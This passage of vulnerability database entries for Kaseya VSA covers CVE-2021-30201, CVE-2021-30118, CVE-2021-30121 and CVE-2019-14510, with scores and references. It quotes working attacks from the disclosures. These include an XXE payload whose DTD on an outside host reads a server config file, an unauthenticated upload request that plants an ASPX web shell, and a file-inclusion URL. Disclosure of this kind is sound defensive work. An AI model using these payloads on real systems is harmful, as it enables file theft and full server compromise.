\u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
},
{
"lang": "es",
"value": "La API /vsaWS/KaseyaWS.asmx puede utilizarse para enviar XML al sistema. Cuando este XML es procesado (externo) las entidades son procesadas y obtenidas de forma insegura por el sistema y devueltas al atacante. Descripci\u00f3n detallada Dada la siguiente petici\u00f3n: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u0026lt;!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob. dtd\"\u0026gt;\u0026lt;data\u0026gt;\u0026amp;send;\u0026lt;/data\u0026gt; ``` Y el siguiente archivo XML alojado en http://192.168.1.170/oob.dtd: ``` \"\u0026gt; %eval; %error; ``` El servidor obtendr\u00e1 este archivo XML y lo procesar\u00e1, leer\u00e1 el archivo c:\\kaseya\\kserver\\kserver.ini y devolver\u00e1 el contenido en la respuesta del servidor como se indica a continuaci\u00f3n. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerEl servidor no pudo procesar la solicitud. ---Hay un error en el documento XML (24, -1000): Identificador de fragmento \u0027######################################################################## # Este es el archivo de configuraci\u00f3n para el KServer. # Col\u00f3quelo en el mismo directorio que el ejecutable del KServer # Una l\u00ednea en blanco o una nueva cabecera de secci\u00f3n v\u00e1lida [] termina cada secci\u00f3n. # Las l\u00edneas de comentario comienzan con ; o # ######################################################################## ``` Problemas de seguridad descubiertos --- * La API resuelve de forma insegura entidades XML externas * La API tiene una respuesta de error demasiado verbosa Impacto --- Usando esta vulnerabilidad un atacante puede leer cualquier archivo en el servidor que el proceso del servidor web pueda leer. Adem\u00e1s, puede ser utilizado para realizar solicitudes HTTP(s) en la red local y as\u00ed utilizar el sistema Kaseya para pivotar en la red local"
}
],
"id": "CVE-2021-30201",
"lastModified": "2024-11-21T06:03:30.653",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-09T14:15:07.957",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30201"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30201"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-30118
Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
References
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/CVE-2021-30118 | Exploit, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory | |
| cve@mitre.org | https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021 | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/CVE-2021-30118 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021 | Release Notes, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
"matchCriteriaId": "081A5508-D14F-4622-B1F4-87761173D935",
"versionEndExcluding": "9.5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
},
{
"lang": "es",
"value": "Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web para el Monitoreo y Gesti\u00f3n Remota Unificada (RMM) de Kaseya VSA 9.5.4.2149 y posteriormente utilizar estos archivos para ejecutar comandos asp La api /SystemTab/uploader.aspx es vulnerable a una carga de archivos arbitraria no autenticada que conduce a RCE. Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web y posteriormente utilizar estos archivos para ejecutar comandos asp. Descripci\u00f3n detallada --- Dada la siguiente petici\u00f3n: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026amp;PathData=C%3A%5CKaseya%5CWebPages%5C\u0026amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1. 194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u0026lt;%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u0026gt; \u0026lt;%@ Import namespace=\"System. Web.UI.WebControls\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Diagnostics\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.IO\" %\u0026gt; \u0026lt;%@ Import namespace=\"System\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Data\" %\u0026gt; \u0026lt;%@ Import namespace=\"System. Data.SqlClient\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Security.AccessControl\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Security.Principal\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Collections.Generic\" %\u0026gt; \u0026lt;%@ Import namespace=\"System. Collections\" %\u0026gt; "
}
],
"id": "CVE-2021-30118",
"lastModified": "2024-11-21T06:03:20.430",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-09T14:15:07.847",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-434"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-30121
Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Severity ?
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Summary
Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118
References
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/CVE-2021-30121 | Exploit, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/CVE-2021-30121 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
"matchCriteriaId": "3A890109-5AD9-4684-A46D-A80D6A5F1834",
"versionEndExcluding": "9.5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
},
{
"lang": "es",
"value": "Inclusi\u00f3n de archivos locales semiautenticados El contenido de archivos arbitrarios puede ser devuelto por el servidor web Ejemplo de solicitud: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` Se requiere un SessionId v\u00e1lido pero puede ser f\u00e1cilmente obtenido a trav\u00e9s de CVE-2021-30118"
}
],
"id": "CVE-2021-30121",
"lastModified": "2024-11-21T06:03:20.880",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-09T14:15:07.930",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30121"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30121"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-829"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2019-14510
Vulnerability from fkie_nvd - Published: 2019-10-11 12:15 - Updated: 2024-11-21 04:26
Severity ?
Summary
An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:rmm:*:*:*",
"matchCriteriaId": "6409EECE-A626-4D65-ABFD-B05DC5CB8218",
"versionEndIncluding": "9.5.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
},
{
"lang": "es",
"value": "Se detect\u00f3 un problema en Kaseya VSA RMM versiones hasta 9.5.0.22. Cuando es usada la configuraci\u00f3n predeterminada, la funcionalidad LAN Cache crea una cuenta local FSAdminxxxxxxxxx (por ejemplo, FSAdmin123456789) en el servidor que aloja la LAN Cache y todos los clientes asignados a una LAN Cache. Esta cuenta es colocada en el grupo de administradores locales de todos los clientes asignados a la LAN Cache. Cuando el cliente asignado es un Controlador de Dominio, la cuenta FSAdminxxxxxxxxx es creada como una cuenta de dominio y agregada autom\u00e1ticamente como miembro del grupo BUILTIN\\Administrators del dominio. Utilizando las conocidas t\u00e9cnicas Pass-the-Hash, un atacante puede usar el mismo hash de FSAdminxxxxxxxxx desde cualquier cliente de LAN Cache y pasarlo hacia un Controlador de Dominio, proporcionando derechos administrativos al atacante en cualquier Controlador de Dominio. (Las mitigaciones Pass-the-Hash de la cuenta local no protegen cuentas de dominio)."
}
],
"id": "CVE-2019-14510",
"lastModified": "2024-11-21T04:26:52.353",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-10-11T12:15:11.050",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.kaseya.com/products/vsa/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
